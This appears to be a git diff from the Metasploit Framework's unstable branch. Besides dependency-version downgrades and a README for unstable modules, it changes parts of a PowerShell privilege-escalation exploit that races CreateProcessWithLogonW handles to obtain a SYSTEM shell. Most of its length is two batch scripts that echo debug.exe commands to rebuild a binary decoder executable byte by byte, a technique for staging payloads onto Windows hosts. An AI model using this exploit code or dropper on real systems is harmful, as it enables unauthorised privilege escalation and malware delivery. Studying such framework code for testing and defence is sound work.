-    rex-mime (0.1.3)
-      rex-text
-    rex-nop (0.1.0)
-      rex-arch
-    rex-ole (0.1.4)
-      rex-text
-    rex-powershell (0.1.69)
+    redcarpet (3.3.4)
+    rex-java (0.1.2)
+    rex-powershell (0.1.0)
      rex-random_identifier
      rex-text
-    rex-random_identifier (0.1.1)
-      rex-text
-    rex-registry (0.1.1)
-    rex-rop_builder (0.1.1)
-      metasm
-      rex-core
-      rex-text
-    rex-socket (0.1.3)
-      rex-core
-    rex-sslscan (0.1.2)
-      rex-socket
+    rex-random_identifier (0.1.0)
      rex-text
+    rex-registry (0.1.0)
    rex-struct2 (0.1.0)
-    rex-text (0.2.13)
-    rex-zip (0.1.1)
+    rex-text (0.1.1)
+    rex-zip (0.1.0)
      rex-text
-    rkelly-remix (0.0.7)
+    rkelly-remix (0.0.6)
    robots (0.10.1)
-    rspec-core (3.5.4)
+    rspec-core (3.5.1)
      rspec-support (~> 3.5.0)
    rspec-expectations (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
@@ -316,7 +241,7 @@ GEM
    rspec-mocks (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.5.0)
-    rspec-rails (3.5.2)
+    rspec-rails (3.5.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
@@ -325,42 +250,31 @@ GEM
      rspec-mocks (~> 3.5.0)
      rspec-support (~> 3.5.0)
    rspec-support (3.5.0)
-    ruby_smb (0.0.8)
-      bindata
-      bit-struct
-      rubyntlm (~> 0.5)
-      windows_error
-    rubyntlm (0.6.1)
-    rubyzip (1.2.1)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
+    rubyntlm (0.6.0)
+    rubyzip (1.2.0)
+    sawyer (0.7.0)
+      addressable (>= 2.3.5, < 2.5)
+      faraday (~> 0.8, < 0.10)
    shoulda-matchers (3.1.1)
      activesupport (>= 4.0.0)
-    signet (0.7.3)
-      addressable (~> 2.3)
-      faraday (~> 0.9)
-      jwt (~> 1.5)
-      multi_json (~> 1.10)
-    simplecov (0.14.1)
+    simplecov (0.12.0)
      docile (~> 1.1.0)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
    simplecov-html (0.10.0)
    slop (3.6.0)
-    sqlite3 (1.3.13)
-    sshkey (1.9.0)
-    thor (0.19.4)
-    thread_safe (0.3.6)
+    sqlite3 (1.3.11)
+    sshkey (1.8.0)
+    thor (0.19.1)
+    thread_safe (0.3.5)
    timecop (0.8.1)
-    tzinfo (1.2.3)
+    tzinfo (1.2.2)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2017.2)
+    tzinfo-data (1.2016.6)
      tzinfo (>= 1.0.0)
-    windows_error (0.1.1)
    xpath (2.0.0)
      nokogiri (~> 1.3)
-    yard (0.9.8)
+    yard (0.9.0)

 PLATFORMS
  ruby
@@ -370,7 +284,6 @@ DEPENDENCIES
  cucumber-rails
  factory_girl_rails
  fivemat
-  metasploit-aggregator
  metasploit-framework!
  octokit (~> 4.0)
  pry
@@ -383,4 +296,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   1.14.6
+   1.12.5
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2017, Rapid7, Inc.
+Copyright: 2006-2016, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -0,0 +1,27 @@
+**This should never appear in Metasploit Framework's master branch!**
+
+The components under the unstable-* directories are unstable, in that
+they are untested, unverified, or otherwise incomplete. Many may be
+useful, but all require some level of work to get into the Metasploit
+master branch.
+
+In order to load the modules specifically, use:
+
+$ ./msfconsole -m unstable-modules/
+
+Unstable scripts and plugins may be referenced by full pathname
+normally.
+
+In order to help move these out of unstable and into the master
+branch, please fork the Metasploit framework project and send pull
+requests with your fixes back to the unstable branch. If you're
+reading this, you already probably have a GitHub account and are
+already familiar with the mechanics of forking and branching.
+Specifically, you probably know everything discussed on:
+
+https://github.com/rapid7/metasploit-framework/wiki
+
+Thanks for taking a look at these unstable modules!
+
+- Tod Beardsley, todb[at]metasploit[dot]com
+
@@ -155,8 +155,8 @@ Add-Type -TypeDefinition @"
        # CreateProcessWithLogonW --> lpCurrentDirectory
        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
+	$path1 = $env:windir
+    	$path1 = "$path1\System32\cmd.exe"
        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
@@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
    $TidArray = @()

    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
+    # Loop Get-ThreadHandle and collect thread handles with a valid TID
+    for ($i=0; $i -lt 500; $i++) {
        $hThread = Get-ThreadHandle
        $hThreadID = [Kernel32]::GetThreadId($hThread)
        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@@ -309,19 +309,6 @@ Add-Type -TypeDefinition @"
            0x00000002, $cmd, $args1,
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
        $hTokenHandle = [IntPtr]::Zero
        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)

@@ -344,4 +331,4 @@ Add-Type -TypeDefinition @"
        $StartTokenRace.Stop()
        $SafeGuard.Stop()
    }
-    exit
+    exit
@@ -0,0 +1,91 @@
+echo a 0100 >>decoder_stub
+echo jmp 197 >>decoder_stub
+echo mov bx,[1bd] >>decoder_stub
+echo call 131 >>decoder_stub
+echo mov bx,[1cc] >>decoder_stub
+echo call 131 >>decoder_stub
+echo mov ax,4c00 >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov ah,3d >>decoder_stub
+echo mov al,00 >>decoder_stub
+echo mov dx,1bf >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov [1bd],ax >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,3c >>decoder_stub
+echo mov cx,2 >>decoder_stub
+echo mov dx,1ce >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov [1cc],ax >>decoder_stub
+echo ret >>decoder_stub
+echo mov ax,3e00 >>decoder_stub
+echo int 21 >>decoder_stub
+echo ret >>decoder_stub
+echo mov bx,[1bd] >>decoder_stub
+echo mov ax,3f00 >>decoder_stub
+echo mov cx,100 >>decoder_stub
+echo mov dx,0200 >>decoder_stub
+echo int 21 >>decoder_stub
+echo cmp ax,2 >>decoder_stub
+echo ja 151 >>decoder_stub
+echo call 178 >>decoder_stub
+echo call 103 >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,0 >>decoder_stub
+echo or al,20 >>decoder_stub
+echo sub al,30 >>decoder_stub
+echo cmp al,9 >>decoder_stub
+echo jbe 164 >>decoder_stub
+echo sub al,31 >>decoder_stub
+echo cmp al,5 >>decoder_stub
+echo ja 165 >>decoder_stub
+echo add al,a >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,ff >>decoder_stub
+echo ret >>decoder_stub
+echo cmp bp,0 >>decoder_stub
+echo jne 175 >>decoder_stub
+echo call 137 >>decoder_stub
+echo mov bp,ax >>decoder_stub
+echo mov si,200 >>decoder_stub
+echo lodsb >>decoder_stub
+echo dec bp >>decoder_stub
+echo ret >>decoder_stub
+echo mov cx,di >>decoder_stub
+echo sub cx,300 >>decoder_stub
+echo mov bx,[1cc] >>decoder_stub
+echo mov ax,4000 >>decoder_stub
+echo mov dx,0300 >>decoder_stub
+echo int 21 >>decoder_stub
+echo ret >>decoder_stub
+echo call 168 >>decoder_stub
+echo call 152 >>decoder_stub
+echo cmp ah,0 >>decoder_stub
+echo jne 18b >>decoder_stub
+echo ret >>decoder_stub
+echo call 116 >>decoder_stub
+echo call 123 >>decoder_stub
+echo mov bp,0 >>decoder_stub
+echo mov di,300 >>decoder_stub
+echo call 18b >>decoder_stub
+echo mov cx,1000 >>decoder_stub
+echo mul cx >>decoder_stub
+echo push ax >>decoder_stub
+echo call 18b >>decoder_stub
+echo pop dx >>decoder_stub
+echo or al,dh >>decoder_stub
+echo stosb >>decoder_stub
+echo cmp bp, 0 >>decoder_stub
+echo jne 1a3 >>decoder_stub
+echo call 178 >>decoder_stub
+echo jmp 1a0 >>decoder_stub
+echo db 00,00 >>decoder_stub
+echo db "testfile.dat",00 >>decoder_stub
+echo db 00,00 >>decoder_stub
+echo db "testfile.out",00 >>decoder_stub
+echo  >>decoder_stub
+echo r cx >>decoder_stub
+echo 0400 >>decoder_stub
+echo n h2b.com >>decoder_stub
+echo w >>decoder_stub
+echo q >>decoder_stub
@@ -0,0 +1,819 @@
+echo n decoder_stub.bin > decoder_stub
+echo r cx >>decoder_stub
+echo 1400 >>decoder_stub
+echo f 0100 ffff 00 >>decoder_stub
+echo e 100 4d 5a 90 >>decoder_stub
+echo e 104 03 >>decoder_stub
+echo e 108 04 >>decoder_stub
+echo e 10c ff ff >>decoder_stub
+echo e 110 b8 >>decoder_stub
+echo e 118 40 >>decoder_stub
+echo e 13c 80 >>decoder_stub
+echo e 140 0e 1f ba 0e >>decoder_stub
+echo e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 >>decoder_stub
+echo e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 >>decoder_stub
+echo e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 >>decoder_stub
+echo e 180 50 45 >>decoder_stub
+echo e 184 4c 01 03 >>decoder_stub
+echo e 188 85 18 7c 48 >>decoder_stub
+echo e 194 e0 >>decoder_stub
+echo e 196 0e 01 0b 01 08 >>decoder_stub
+echo e 19d 0a >>decoder_stub
+echo e 1a1 08 >>decoder_stub
+echo e 1a8 be 28 >>decoder_stub
+echo e 1ad 20 >>decoder_stub
+echo e 1b1 40 >>decoder_stub
+echo e 1b6 40 >>decoder_stub
+echo e 1b9 20 >>decoder_stub
+echo e 1bd 02 >>decoder_stub
+echo e 1c0 04 >>decoder_stub
+echo e 1c8 04 >>decoder_stub
+echo e 1d1 80 >>decoder_stub
+echo e 1d5 02 >>decoder_stub
+echo e 1dc 03 >>decoder_stub
+echo e 1de 40 05 >>decoder_stub
+echo e 1e2 10 >>decoder_stub
+echo e 1e5 10 >>decoder_stub
+echo e 1ea 10 >>decoder_stub
+echo e 1ed 10 >>decoder_stub
+echo e 1f4 10 >>decoder_stub
+echo e 200 6c 28 >>decoder_stub
+echo e 204 4f >>decoder_stub
+echo e 209 40 >>decoder_stub
+echo e 20c 30 05 >>decoder_stub
+echo e 221 60 >>decoder_stub
+echo e 224 0c >>decoder_stub
+echo e 228 fc 27 >>decoder_stub
+echo e 22c 1c >>decoder_stub
+echo e 259 20 >>decoder_stub
+echo e 25c 08 >>decoder_stub
+echo e 268 08 20 >>decoder_stub
+echo e 26c 48 >>decoder_stub
+echo e 278 2e 74 65 78 74 >>decoder_stub
+echo e 280 c4 08 >>decoder_stub
+echo e 285 20 >>decoder_stub
+echo e 289 0a >>decoder_stub
+echo e 28d 02 >>decoder_stub
+echo e 29c 20 >>decoder_stub
+echo e 29f 60 2e 72 73 72 63 >>decoder_stub
+echo e 2a8 30 05 >>decoder_stub
+echo e 2ad 40 >>decoder_stub
+echo e 2b1 06 >>decoder_stub
+echo e 2b5 0c >>decoder_stub
+echo e 2c4 40 >>decoder_stub
+echo e 2c7 40 2e 72 65 6c 6f 63 >>decoder_stub
+echo e 2d0 0c >>decoder_stub
+echo e 2d5 60 >>decoder_stub
+echo e 2d9 02 >>decoder_stub
+echo e 2dd 12 >>decoder_stub
+echo e 2ec 40 >>decoder_stub
+echo e 2ef 42 >>decoder_stub
+echo e 300 a0 28 >>decoder_stub
+echo e 308 48 >>decoder_stub
+echo e 30c 02 >>decoder_stub
+echo e 30e 05 >>decoder_stub
+echo e 310 24 21 >>decoder_stub
+echo e 314 d8 06 >>decoder_stub
+echo e 318 01 >>decoder_stub
+echo e 31c 01 >>decoder_stub
+echo e 31f 06 >>decoder_stub
+echo e 350 13 30 04 >>decoder_stub
+echo e 354 be >>decoder_stub
+echo e 358 01 >>decoder_stub
+echo e 35b 11 >>decoder_stub
+echo e 35d 02 8e 69 17 fe 01 13 06 11 06 2d 12 >>decoder_stub
+echo e 36a 72 01 >>decoder_stub
+echo e 36e 70 28 10 >>decoder_stub
+echo e 373 0a >>decoder_stub
+echo e 376 38 9e >>decoder_stub
+echo e 37c 02 16 9a 28 11 >>decoder_stub
+echo e 383 0a 72 4b >>decoder_stub
+echo e 388 70 72 4f >>decoder_stub
+echo e 38d 70 6f 12 >>decoder_stub
+echo e 392 0a 72 51 >>decoder_stub
+echo e 397 70 72 4f >>decoder_stub
+echo e 39c 70 6f 12 >>decoder_stub
+echo e 3a1 0a 0a 06 6f 13 >>decoder_stub
+echo e 3a8 0a 18 5b 8d 15 >>decoder_stub
+echo e 3af 01 0b 16 0c 72 4f >>decoder_stub
+echo e 3b7 70 0d 16 13 04 2b 21 >>decoder_stub
+echo e 3bf 06 11 04 18 6f 14 >>decoder_stub
+echo e 3c7 0a 0d 07 08 09 1f 10 28 15 >>decoder_stub
+echo e 3d2 0a 9c 08 17 58 0c >>decoder_stub
+echo e 3d9 11 04 18 58 13 04 11 04 06 6f 13 >>decoder_stub
+echo e 3e6 0a fe 04 13 06 11 06 2d cf 02 16 9a 72 55 >>decoder_stub
+echo e 3f6 70 28 16 >>decoder_stub
+echo e 3fb 0a 28 17 >>decoder_stub
+echo e 400 0a 13 05 11 05 07 16 07 8e 69 6f 18 >>decoder_stub
+echo e 40e 0a >>decoder_stub
+echo e 410 11 05 6f 19 >>decoder_stub
+echo e 416 0a >>decoder_stub
+echo e 419 2a 1e 02 28 1a >>decoder_stub
+echo e 420 0a 2a >>decoder_stub
+echo e 424 42 53 4a 42 01 >>decoder_stub
+echo e 42a 01 >>decoder_stub
+echo e 430 0c >>decoder_stub
+echo e 434 76 32 2e 30 2e 35 30 37 32 37 >>decoder_stub
+echo e 442 05 >>decoder_stub
+echo e 444 6c >>decoder_stub
+echo e 448 30 02 >>decoder_stub
+echo e 44c 23 7e >>decoder_stub
+echo e 450 9c 02 >>decoder_stub
+echo e 454 d0 02 >>decoder_stub
+echo e 458 23 53 74 72 69 6e 67 73 >>decoder_stub
+echo e 464 6c 05 >>decoder_stub
+echo e 468 60 >>decoder_stub
+echo e 46c 23 55 53 >>decoder_stub
+echo e 470 cc 05 >>decoder_stub
+echo e 474 10 >>decoder_stub
+echo e 478 23 47 55 49 44 >>decoder_stub
+echo e 480 dc 05 >>decoder_stub
+echo e 484 fc >>decoder_stub
+echo e 488 23 42 6c 6f 62 >>decoder_stub
+echo e 494 02 >>decoder_stub
+echo e 497 01 47 15 02 >>decoder_stub
+echo e 49c 09 >>decoder_stub
+echo e 4a1 fa 01 33 >>decoder_stub
+echo e 4a5 16 >>decoder_stub
+echo e 4a8 01 >>decoder_stub
+echo e 4ac 18 >>decoder_stub
+echo e 4b0 02 >>decoder_stub
+echo e 4b4 02 >>decoder_stub
+echo e 4b8 01 >>decoder_stub
+echo e 4bc 1a >>decoder_stub
+echo e 4c0 0d >>decoder_stub
+echo e 4c4 01 >>decoder_stub
+echo e 4c8 01 >>decoder_stub
+echo e 4cc 01 >>decoder_stub
+echo e 4d2 0a >>decoder_stub
+echo e 4d4 01 >>decoder_stub
+echo e 4da 06 >>decoder_stub
+echo e 4dc 36 >>decoder_stub
+echo e 4de 2f >>decoder_stub
+echo e 4e0 06 >>decoder_stub
+echo e 4e2 5f >>decoder_stub
+echo e 4e4 4d >>decoder_stub
+echo e 4e6 06 >>decoder_stub
+echo e 4e8 76 >>decoder_stub
+echo e 4ea 4d >>decoder_stub
+echo e 4ec 06 >>decoder_stub
+echo e 4ee 93 >>decoder_stub
+echo e 4f0 4d >>decoder_stub
+echo e 4f2 06 >>decoder_stub
+echo e 4f4 b2 >>decoder_stub
+echo e 4f6 4d >>decoder_stub
+echo e 4f8 06 >>decoder_stub
+echo e 4fa cb >>decoder_stub
+echo e 4fc 4d >>decoder_stub
+echo e 4fe 06 >>decoder_stub
+echo e 500 e4 >>decoder_stub
+echo e 502 4d >>decoder_stub
+echo e 504 06 >>decoder_stub
+echo e 506 ff >>decoder_stub
+echo e 508 4d >>decoder_stub
+echo e 50a 06 >>decoder_stub
+echo e 50c 1a 01 4d >>decoder_stub
+echo e 510 06 >>decoder_stub
+echo e 512 52 01 33 01 06 >>decoder_stub
+echo e 518 66 01 33 01 06 >>decoder_stub
+echo e 51e 74 01 4d >>decoder_stub
+echo e 522 06 >>decoder_stub
+echo e 524 8d 01 4d >>decoder_stub
+echo e 528 06 >>decoder_stub
+echo e 52a bd 01 aa 01 3b >>decoder_stub
+echo e 530 d1 01 >>decoder_stub
+echo e 534 06 >>decoder_stub
+echo e 537 02 e0 01 06 >>decoder_stub
+echo e 53c 20 02 e0 01 06 >>decoder_stub
+echo e 542 3e 02 2f >>decoder_stub
+echo e 546 06 >>decoder_stub
+echo e 548 5a 02 50 02 06 >>decoder_stub
+echo e 54e 6b 02 2f >>decoder_stub
+echo e 552 06 >>decoder_stub
+echo e 554 85 02 2f >>decoder_stub
+echo e 558 06 >>decoder_stub
+echo e 55a 94 02 2f >>decoder_stub
+echo e 55e 06 >>decoder_stub
+echo e 560 aa 02 50 02 06 >>decoder_stub
+echo e 566 bc 02 50 02 >>decoder_stub
+echo e 56e 01 >>decoder_stub
+echo e 574 01 >>decoder_stub
+echo e 576 01 >>decoder_stub
+echo e 57a 10 >>decoder_stub
+echo e 57c 16 >>decoder_stub
+echo e 57e 1e >>decoder_stub
+echo e 580 05 >>decoder_stub
+echo e 582 01 >>decoder_stub
+echo e 584 01 >>decoder_stub
+echo e 586 50 20 >>decoder_stub
+echo e 58c 91 >>decoder_stub
+echo e 58e 3d >>decoder_stub
+echo e 590 0a >>decoder_stub
+echo e 592 01 >>decoder_stub
+echo e 594 1a 21 >>decoder_stub
+echo e 59a 86 18 42 >>decoder_stub
+echo e 59e 10 >>decoder_stub
+echo e 5a0 02 >>decoder_stub
+echo e 5a4 01 >>decoder_stub
+echo e 5a6 48 >>decoder_stub
+echo e 5a8 11 >>decoder_stub
+echo e 5aa 42 >>decoder_stub
+echo e 5ac 14 >>decoder_stub
+echo e 5ae 19 >>decoder_stub
+echo e 5b0 42 >>decoder_stub
+echo e 5b2 14 >>decoder_stub
+echo e 5b4 21 >>decoder_stub
+echo e 5b6 42 >>decoder_stub
+echo e 5b8 14 >>decoder_stub
+echo e 5ba 29 >>decoder_stub
+echo e 5bc 42 >>decoder_stub
+echo e 5be 14 >>decoder_stub
+echo e 5c0 31 >>decoder_stub
+echo e 5c2 42 >>decoder_stub
+echo e 5c4 14 >>decoder_stub
+echo e 5c6 39 >>decoder_stub
+echo e 5c8 42 >>decoder_stub
+echo e 5ca 14 >>decoder_stub
+echo e 5cc 41 >>decoder_stub
+echo e 5ce 42 >>decoder_stub
+echo e 5d0 14 >>decoder_stub
+echo e 5d2 49 >>decoder_stub
+echo e 5d4 42 >>decoder_stub
+echo e 5d6 14 >>decoder_stub
+echo e 5d8 51 >>decoder_stub
+echo e 5da 42 >>decoder_stub
+echo e 5dc 19 >>decoder_stub
+echo e 5de 59 >>decoder_stub
+echo e 5e0 42 >>decoder_stub
+echo e 5e2 14 >>decoder_stub
+echo e 5e4 61 >>decoder_stub
+echo e 5e6 42 >>decoder_stub
+echo e 5e8 14 >>decoder_stub
+echo e 5ea 69 >>decoder_stub
+echo e 5ec 42 >>decoder_stub
+echo e 5ee 14 >>decoder_stub
+echo e 5f0 71 >>decoder_stub
+echo e 5f2 42 >>decoder_stub
+echo e 5f4 1e >>decoder_stub
+echo e 5f6 81 >>decoder_stub
+echo e 5f8 42 >>decoder_stub
+echo e 5fa 24 >>decoder_stub
+echo e 5fc 89 >>decoder_stub
+echo e 5fe 42 >>decoder_stub
+echo e 600 10 >>decoder_stub
+echo e 602 91 >>decoder_stub
+echo e 604 46 02 29 >>decoder_stub
+echo e 608 99 >>decoder_stub
+echo e 60a 5f 02 2e >>decoder_stub
+echo e 60e a1 >>decoder_stub
+echo e 610 72 02 33 >>decoder_stub
+echo e 614 a1 >>decoder_stub
+echo e 616 7a 02 39 >>decoder_stub
+echo e 61a a1 >>decoder_stub
+echo e 61c 8a 02 3d >>decoder_stub
+echo e 620 b1 >>decoder_stub
+echo e 622 9c 02 43 >>decoder_stub
+echo e 626 a1 >>decoder_stub
+echo e 628 a3 02 49 >>decoder_stub
+echo e 62c 99 >>decoder_stub
+echo e 62e b5 02 4f >>decoder_stub
+echo e 632 c1 >>decoder_stub
+echo e 634 c3 02 55 >>decoder_stub
+echo e 638 c1 >>decoder_stub
+echo e 63a c9 02 10 >>decoder_stub
+echo e 63e 09 >>decoder_stub
+echo e 640 42 >>decoder_stub
+echo e 642 10 >>decoder_stub
+echo e 644 2e >>decoder_stub
+echo e 646 0b >>decoder_stub
+echo e 648 69 >>decoder_stub
+echo e 64a 2e >>decoder_stub
+echo e 64c 13 >>decoder_stub
+echo e 64e 76 >>decoder_stub
+echo e 650 2e >>decoder_stub
+echo e 652 1b >>decoder_stub
+echo e 654 76 >>decoder_stub
+echo e 656 2e >>decoder_stub
+echo e 658 23 >>decoder_stub
+echo e 65a 76 >>decoder_stub
+echo e 65c 2e >>decoder_stub
+echo e 65e 2b >>decoder_stub
+echo e 660 69 >>decoder_stub
+echo e 662 2e >>decoder_stub
+echo e 664 33 >>decoder_stub
+echo e 666 7c >>decoder_stub
+echo e 668 2e >>decoder_stub
+echo e 66a 3b >>decoder_stub
+echo e 66c 76 >>decoder_stub
+echo e 66e 2e >>decoder_stub
+echo e 670 4b >>decoder_stub
+echo e 672 76 >>decoder_stub
+echo e 674 2e >>decoder_stub
+echo e 676 53 >>decoder_stub
+echo e 678 94 >>decoder_stub
+echo e 67a 2e >>decoder_stub
+echo e 67c 63 >>decoder_stub
+echo e 67e be >>decoder_stub
+echo e 680 2e >>decoder_stub
+echo e 682 6b >>decoder_stub
+echo e 684 cb >>decoder_stub
+echo e 686 2e >>decoder_stub
+echo e 688 73 >>decoder_stub
+echo e 68a d4 >>decoder_stub
+echo e 68c 2e >>decoder_stub
+echo e 68e 7b >>decoder_stub
+echo e 690 dd >>decoder_stub
+echo e 692 5d >>decoder_stub
+echo e 694 04 80 >>decoder_stub
+echo e 698 01 >>decoder_stub
+echo e 6a6 1e >>decoder_stub
+echo e 6aa 02 >>decoder_stub
+echo e 6b6 01 >>decoder_stub
+echo e 6b8 26 >>decoder_stub
+echo e 6c1 3c 4d 6f 64 75 6c 65 3e >>decoder_stub
+echo e 6ca 68 65 78 32 62 69 6e 2e 65 78 65 >>decoder_stub
+echo e 6d6 50 72 6f 67 72 61 6d >>decoder_stub
+echo e 6de 68 65 78 32 62 69 6e >>decoder_stub
+echo e 6e6 6d 73 63 6f 72 6c 69 62 >>decoder_stub
+echo e 6ef 53 79 73 74 65 6d >>decoder_stub
+echo e 6f6 4f 62 6a 65 63 74 >>decoder_stub
+echo e 6fd 4d 61 69 6e >>decoder_stub
+echo e 702 2e 63 74 6f 72 >>decoder_stub
+echo e 708 61 72 67 73 >>decoder_stub
+echo e 70d 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e >>decoder_stub
+echo e 71f 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 >>decoder_stub
+echo e 733 74 65 >>decoder_stub
+echo e 736 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 >>decoder_stub
+echo e 74a 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 753 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f >>decoder_stub
+echo e 767 6e 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 772 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 >>decoder_stub
+echo e 786 62 75 74 65 >>decoder_stub
+echo e 78b 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 >>decoder_stub
+echo e 79f 62 75 74 65 >>decoder_stub
+echo e 7a4 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 >>decoder_stub
+echo e 7b8 72 69 62 75 74 65 >>decoder_stub
+echo e 7bf 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 >>decoder_stub
+echo e 7d3 72 69 62 75 74 65 >>decoder_stub
+echo e 7da 41 73 73 65 6d 62 6c 79 43 75 6c 74 75 72 65 41 74 74 72 69 >>decoder_stub
+echo e 7ee 62 75 74 65 >>decoder_stub
+echo e 7f3 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 >>decoder_stub
+echo e 807 6f 70 53 65 72 76 69 63 65 73 >>decoder_stub
+echo e 812 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 826 47 75 69 64 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 834 41 73 73 65 6d 62 6c 79 56 65 72 73 69 6f 6e 41 74 74 72 69 >>decoder_stub
+echo e 848 62 75 74 65 >>decoder_stub
+echo e 84d 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 >>decoder_stub
+echo e 861 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 86a 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 >>decoder_stub
+echo e 87d 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 891 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 >>decoder_stub
+echo e 8a0 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 >>decoder_stub
+echo e 8b4 6c 65 72 53 65 72 76 69 63 65 73 >>decoder_stub
+echo e 8c0 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f >>decoder_stub
+echo e 8d4 6e 73 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 8e0 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 >>decoder_stub
+echo e 8f4 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 8fe 43 6f 6e 73 6f 6c 65 >>decoder_stub
+echo e 906 57 72 69 74 65 4c 69 6e 65 >>decoder_stub
+echo e 910 53 79 73 74 65 6d 2e 49 4f >>decoder_stub
+echo e 91a 46 69 6c 65 >>decoder_stub
+echo e 91f 52 65 61 64 41 6c 6c 54 65 78 74 >>decoder_stub
+echo e 92b 53 74 72 69 6e 67 >>decoder_stub
+echo e 932 52 65 70 6c 61 63 65 >>decoder_stub
+echo e 93a 67 65 74 5f 4c 65 6e 67 74 68 >>decoder_stub
+echo e 945 42 79 74 65 >>decoder_stub
+echo e 94a 53 75 62 73 74 72 69 6e 67 >>decoder_stub
+echo e 954 43 6f 6e 76 65 72 74 >>decoder_stub
+echo e 95c 54 6f 42 79 74 65 >>decoder_stub
+echo e 963 43 6f 6e 63 61 74 >>decoder_stub
+echo e 96a 46 69 6c 65 53 74 72 65 61 6d >>decoder_stub
+echo e 975 43 72 65 61 74 65 >>decoder_stub
+echo e 97c 53 74 72 65 61 6d >>decoder_stub
+echo e 983 57 72 69 74 65 >>decoder_stub
+echo e 989 43 6c 6f 73 65 >>decoder_stub
+echo e 991 49 55 >>decoder_stub
+echo e 994 73 >>decoder_stub
+echo e 996 61 >>decoder_stub
+echo e 998 67 >>decoder_stub
+echo e 99a 65 >>decoder_stub
+echo e 99c 3a >>decoder_stub
+echo e 99e 20 >>decoder_stub
+echo e 9a0 20 >>decoder_stub
+echo e 9a2 20 >>decoder_stub
+echo e 9a4 68 >>decoder_stub
+echo e 9a6 65 >>decoder_stub
+echo e 9a8 78 >>decoder_stub
+echo e 9aa 32 >>decoder_stub
+echo e 9ac 62 >>decoder_stub
+echo e 9ae 69 >>decoder_stub
+echo e 9b0 6e >>decoder_stub
+echo e 9b2 2e >>decoder_stub
+echo e 9b4 65 >>decoder_stub
+echo e 9b6 78 >>decoder_stub
+echo e 9b8 65 >>decoder_stub
+echo e 9ba 20 >>decoder_stub
+echo e 9bc 3c >>decoder_stub
+echo e 9be 68 >>decoder_stub
+echo e 9c0 65 >>decoder_stub
+echo e 9c2 78 >>decoder_stub
+echo e 9c4 69 >>decoder_stub
+echo e 9c6 6e >>decoder_stub
+echo e 9c8 70 >>decoder_stub
+echo e 9ca 75 >>decoder_stub
+echo e 9cc 74 >>decoder_stub
+echo e 9ce 66 >>decoder_stub
+echo e 9d0 69 >>decoder_stub
+echo e 9d2 6c >>decoder_stub
+echo e 9d4 65 >>decoder_stub
+echo e 9d6 3e >>decoder_stub
+echo e 9d8 08 >>decoder_stub
+echo e 9da 01 03 0d >>decoder_stub
